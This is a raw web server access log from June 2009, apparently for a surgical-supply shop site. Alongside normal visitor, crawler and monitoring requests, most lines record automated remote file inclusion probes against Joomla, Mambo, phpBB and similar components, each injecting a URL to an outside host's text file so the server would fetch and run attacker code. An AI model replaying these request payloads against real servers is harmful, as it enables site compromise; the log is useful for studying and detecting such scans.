81.152.107.56 - - [12/Jun/2009:03:33:59 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:33:59 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.152.107.56 - - [12/Jun/2009:03:34:00 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
116.121.201.70 - - [12/Jun/2009:03:34:05 -0400] "GET /logs/access_log.Q109053000/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Jun/2009:03:34:12 -0400] "GET /logs/access_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:34:22 -0400] "GET /logs/access_log.Q109052900%20%20/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:34:22 -0400] "GET /logs/access_log.Q109053000/joomla/index.php?option=com_restaurante&task=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:34:32 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:34:32 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:34:32 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:03:34:47 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Jun/2009:03:35:02 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Jun/2009:03:35:39 -0400] "GET /logs/access_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.166.10 - - [12/Jun/2009:03:36:26 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.49.29 - - [12/Jun/2009:03:38:27 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:27 -0400] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:27 -0400] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:27 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:35 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:35 -0400] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:35 -0400] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:38:35 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jun/2009:03:38:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.170 - - [12/Jun/2009:03:39:30 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.170 - - [12/Jun/2009:03:39:31 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.49.29 - - [12/Jun/2009:03:40:28 -0400] "GET /logs/access_log.Q109051600%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
222.122.49.29 - - [12/Jun/2009:03:40:30 -0400] "GET /logs/access_log.Q109051600%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://guzelsanatlar.trakya.edu.tr/modules/id1.txt??? HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
213.229.183.76 - - [12/Jun/2009:03:41:09 -0400] "GET /logs/access_log.Q109052900/modules/My_eGallery/index.php?basepath=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:03:41:23 -0400] "GET /logs/access_log.Q108122200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.198.32.3 - - [12/Jun/2009:03:43:07 -0400] "GET //galeria.php?start=0&kategoria=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:43:07 -0400] "GET /logs/access_log.Q109051800%20//galeria.php?start=0&kategoria=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:43:07 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:43:35 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:43:42 -0400] "GET /logs/error_log.Q109051800//galeria.php?start=0&kategoria=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
116.121.201.70 - - [12/Jun/2009:03:43:48 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:43:49 -0400] "GET /logs/access_log.Q109053000/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:43:51 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
116.121.201.70 - - [12/Jun/2009:03:43:52 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:03:43:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.227.229 - - [12/Jun/2009:03:44:41 -0400] "GET /logs/access_log.Q109052700/components/com_forum/download.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.239.227.229 - - [12/Jun/2009:03:44:41 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.239.227.229 - - [12/Jun/2009:03:44:41 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
12.68.140.202 - - [12/Jun/2009:03:44:43 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:44:43 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:44:44 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.820"
87.106.135.14 - - [12/Jun/2009:03:44:50 -0400] "GET /logs/access_log.Q109060800%20%20//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:03:44:50 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.135.14 - - [12/Jun/2009:03:44:50 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
12.68.140.202 - - [12/Jun/2009:03:44:55 -0400] "GET /logs/error_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:45:00 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:45:00 -0400] "GET /logs/error_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:45:00 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.820"
12.68.140.202 - - [12/Jun/2009:03:45:00 -0400] "GET /logs/error_log.Q109051200/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 282 "-" "libwww-perl/5.820"
87.106.135.14 - - [12/Jun/2009:03:45:03 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.14 - - [12/Jun/2009:03:45:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0048644B1BD29100326E04S+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.203.180.144 - - [12/Jun/2009:03:45:52 -0400] "GET //include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.203.180.144 - - [12/Jun/2009:03:45:52 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.203.180.144 - - [12/Jun/2009:03:45:52 -0400] "GET /logs//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
12.68.140.202 - - [12/Jun/2009:03:45:58 -0400] "GET /logs/error_log.Q109051200%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://208.98.22.241/id.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.820"
211.203.180.144 - - [12/Jun/2009:03:46:20 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:03:48:54 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.145.152.113 - - [12/Jun/2009:03:49:25 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:49:38 -0400] "GET /logs/access_log.Q109052400/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
75.145.152.113 - - [12/Jun/2009:03:49:46 -0400] "GET /logs/access_log.Q109052100/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:03:50:11 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:50:11 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:50:11 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
91.198.32.3 - - [12/Jun/2009:03:50:11 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
124.137.12.10 - - [12/Jun/2009:03:50:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
124.137.12.10 - - [12/Jun/2009:03:50:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
124.137.12.10 - - [12/Jun/2009:03:50:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
124.137.12.10 - - [12/Jun/2009:03:50:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
124.0.146.100 - - [12/Jun/2009:03:50:29 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:03:51:32 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:03:51:36 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:03:51:44 -0400] "GET /images/iso9001.gif HTTP/1.1" 200 1220 "-" "Googlebot-Image/1.0"
118.129.166.203 - - [12/Jun/2009:03:52:03 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
91.198.32.3 - - [12/Jun/2009:03:52:52 -0400] "GET /logs/access_log.Q109051100%20//components/com_flyspray/startdown.php?file=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
222.239.227.229 - - [12/Jun/2009:03:53:33 -0400] "GET /logs/error_log.Q109051200/components/com_forum/download.php?phpbb_root_path=http://www.nextstepgrowth.com/workshops/fx29id2.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
209.59.12.99 - - [12/Jun/2009:03:54:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [12/Jun/2009:03:54:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L004A904F25A2E600CDBE071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.203.180.144 - - [12/Jun/2009:03:55:23 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/safe.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
211.203.180.144 - - [12/Jun/2009:03:55:23 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/safe.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
211.203.180.144 - - [12/Jun/2009:03:55:24 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/safe.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
210.89.40.156 - - [12/Jun/2009:03:55:53 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; (R1 1.6))"
210.89.40.156 - - [12/Jun/2009:03:55:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; (R1 1.6))"
115.133.214.159 - - [12/Jun/2009:03:56:29 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://littlesaints.bravehost.com/peppe/just.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.812"
115.133.214.159 - - [12/Jun/2009:03:56:32 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://littlesaints.bravehost.com/peppe/just.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
115.133.214.159 - - [12/Jun/2009:03:56:38 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://littlesaints.bravehost.com/peppe/just.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
210.89.40.156 - - [12/Jun/2009:03:56:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; (R1 1.6))"
210.89.40.156 - - [12/Jun/2009:03:57:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; (R1 1.6))"
211.203.180.144 - - [12/Jun/2009:03:57:24 -0400] "GET /logs/access_log.Q109052500/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/safe.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
118.129.166.203 - - [12/Jun/2009:03:58:02 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:03:58:02 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:03:58:02 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:03:58:19 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:46 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:48 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:48 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:03:58:48 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:03:59:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [12/Jun/2009:04:00:10 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
123.143.98.5 - - [12/Jun/2009:04:00:11 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
